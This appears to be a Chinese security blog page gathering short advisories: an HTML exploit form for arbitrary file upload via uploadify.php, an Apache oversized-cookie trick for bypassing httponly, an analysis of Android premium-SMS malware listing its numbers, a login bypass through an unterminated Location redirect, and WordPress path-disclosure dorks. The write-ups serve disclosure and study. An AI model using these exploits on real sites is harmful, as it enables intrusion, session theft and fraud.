Insight-labs

Author:   D.

有用到uploadify2.1.4的程序都有这个问题
很多 cms 用过这个 uploadify.php
很多程序員直接調用swf文件 就不管這個uploadify.php了導致安全問題產生

Software Link: http://www.thinksaas.cn

Exp code：upload.htm

<html>
<body>
<form action="http://xxx/public/js/uploadify/uploadify.php" method="post" enctype="multipart/form-data">
<input name="Filedata" type="file" />
<input name="sub" type="submit" value="upload" />
</form>
</body>
</html>

( 图片为安全测试用途 档案已删除 )

Author:secdragon

先说一下这个漏洞的危害，现在很多站点以及一些成熟的cms为了防止出现xss漏洞来盗取用户cookie的问题，都采用给cookie附上httponly的属性，来禁止js获取用户的cookie，来降低xss的危害，而apache的这个问题刚好可以用来绕过cookie的这个httponly的属性。

老外在exploit-db上公布了测试apache站点是否有这个问题的js代码。

http://www.exploit-db.com/exploits/18442/

仔细读一下这个代码就知道这个漏洞的成因，是由于当apache接收到一个大于4k的cookie的时候，会返回一个400的错误，并且把所有的cookie完整的在页面当中显示出来，提示这个cookie过大，那么我们的攻击方式便是利用xss，给用户在正常的cookie的基础上再增加一些无用的cookie，使用户的cookie大于4k，然后js再发包请求一次网站，这时apache返回的响应就是400，并把cookie显示出来，这是我们只要用js正则匹配出正常的cookie即可，由于不是js直接获取cookie，而只是正则匹配出返回的字符串而已，便相当于绕过了cookie的httponly的属性，完整的攻击再加上把匹配的字符串再发送到自己的一个接受文件当中即可。

完整的攻击代码不贴了，在老外给的js代码里添加一个把匹配出的正常cookie发送到自己的接收文件当中即可。apache的这个问题，测试了很多版本，除了1月31号的2.2.22版本之前的全部都有这个问题。

Author:hip

此恶意软件行為是发送的恶意短信,这些号码意味者都是高昂的费用
发送一封短信例如约 10RMB 等

Malware Info
Name: yumm.apk
File Size: 179 KB
android:versionCode=1
android:versionName=1.0
Packages: com.depositmobi
Md5: bfb567f4e2634aa79af27d14f37afd6b

程序画面:

AndroidManifest.xml
activity:
<activity android:label=”@string/app_name” android:name=”.Main”>
<intent-filter>
<action android:name=”android.intent.action.MAIN” />
<category android:name=”android.intent.category.LAUNCHER” />
</intent-filter>
</activity>

uses-permission:
android.permission.SEND_SMS
android.permission.CALL_PHONE
android.permission.RECEIVE_WAP_PUSH
android.permission.READ_SMS
android.permission.RECEIVE_WAP_PUSH
android.permission.INTERNET

Classes Overview:

ActivationDoneActivity
ActivationScheme
FilesParser
Main
R
ReadOfferActivity

反编译到 JAVA Souce

關建的行為 SEND_SMS 號碼 都在 main.class ，但嘗試將 Class to JAVA 會發現程序出錯，估計可能有一些行為是讓分析工具錯誤！

所以來看分析 Opcode:

0x23c invoke-virtual/range v0 , v1 , v2 , v3 , v4 , v5 , [meth@ 27 Landroid/telephony/SmsManager; (Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;) V sendTextMessage]

0×242 add-int/lit8 v6 , v6 , [#+ 1]
0×246 goto/16 [+ -148]
0x24a iget-object v1 , v14 , [field@ 83 Lcom/depositmobi/Main; Ljava/lang/String; currentMCC]
0x24e const-string v2 , [string@ 89 400]
0×252 invoke-virtual v1 , v2 , [meth@ 103 Ljava/lang/String; (Ljava/lang/Object;) Z equals]
0×258 move-result v1
0x25a if-eqz v1 , [+ 12]
0x25e const-string v3 , [string@ 142 7665240+0+1+p+a+2]
0×262 const-string v1 , [string@ 78 3304]

发送号码:3304  内容:7665240+0+1+p+a+2

以下其他发送号码及内容:

7781        155744+0+1+p+a+2
3336        7665240+0+1+p+a+2
3838        673811+0+1+p+a+2
373          673811+0+1+p+a+2

Main Class Activate Methods CFG

弱点说明:该管理系统存在商业逻辑漏洞跳过验证Sessionid 机制，则可绕过身分证验登入后台

技術細節: 网站认证过程逻辑出现问题，程序判断用户未进行认证，执行header(“Location:login.php”);，但是没有执行die();来终止php的执行。此时的现象是，虽然客户端发生跳转，但是程序还是正常执行下去，客户端只要阻止Location跳转即可看到管理界面。

阻止瀏覽器 Location 跳转可以透過 Burp 或是 Fiddler 都可以
在这边我们使用 Fiddler 的插件 FiddlerScript 来演示，可以透过他来修改 Fiddler 上的 Script Rule

只需于  static function OnPeekAtResponseHeaders(oSession: Session) 中
添加 oSession.oResponse.headers.Remove(“Location”); 即可

存在此弱点的网站:

http://rainbowlife.163.com/ (已补)

http://xiqing.163.com/ (已补)

漏洞验证视频:

Author:hip
Wordpress Version:All
Expose Path URL:wp-content/themes/xxx/ xxx is wp themes name
google dorks:inurl:wp-content/themes/
inurl:wp-content/themes/ warning
solution:php.ini set display_error false